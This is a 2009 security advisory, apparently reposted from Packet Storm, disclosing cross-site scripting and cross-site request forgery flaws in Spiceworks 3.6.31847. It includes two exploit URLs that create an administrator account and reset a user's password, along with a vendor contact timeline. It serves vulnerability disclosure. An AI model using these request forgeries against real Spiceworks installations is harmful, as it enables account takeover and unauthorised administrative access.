Spiceworks version 3.6.31847 suffers from cross site scripting and cross site request forgery vulnerabilities.
b2dd9ecd24e0e81ec7f60bfed240a2d836cb0aad58dd4b3fdce264ca62ca2a8anGenuity Information Services - Security Advisory
Advisory ID: NGENUITY-2009-009 - Spiceworks Multiple Vulnerabilities
(XSS & CSRF)
Application: Spiceworks 3.6.31847
Vendor: Spiceworks
Vendor website: http://www.spiceworks.com
Author: Adam Baldwin (adam_baldwin@ngenuity-is.com)
Class: XSS, CSRF
I. BACKGROUND
Spiceworks is a network management, monitoring, helpdesk, etc
application that
uses a web based front end.
II. DETAILS
Multiple vulnerabilities exist within the Spiceworks platform that
can be used
to take over or otherwise abuse the application / infrastructure.
These vulnerabilities allow for the following attack scenarios to
be executed.
1. Creation of a new Administrator account
2. Password reset of users
Exploit Examples:
Create Administrator Account:
http://example.com/settings/users/create?user%5Bfirst_name%5D=Joe&user%5Bla
st_name%5D=Nobody&user%5Bemail%5D=user%40example.com&user%5Brole%5D=admin&us
er%5Bpassword%5D=PASSWORD&user%5Bpassword_confirmation%5D=PASSWORD
User Password Reset:
http://example.com/settings/users/change_password/1?user%5Bpassword%5D=PASSWORD
&editorId=password_entry_for_1
III. REFERENCES
[1] - http://www.spiceworks.com
[2] - http://cwe.mitre.org/data/definitions/79.html
[3] - http://cwe.mitre.org/data/definitions/352.html
IV. VENDOR COMMUNICATION
4.1.2009 - Vulnerability Discovery & Vendor Notification
4.6.2009 - Second attempt to contact vendor
4.7.2009 - Initial vendor response
8.8.2009 - Advisory Release
Copyright (c) 2009 nGenuity Information Services, LLC
http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-xss-in-kayako-supportsuite/
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed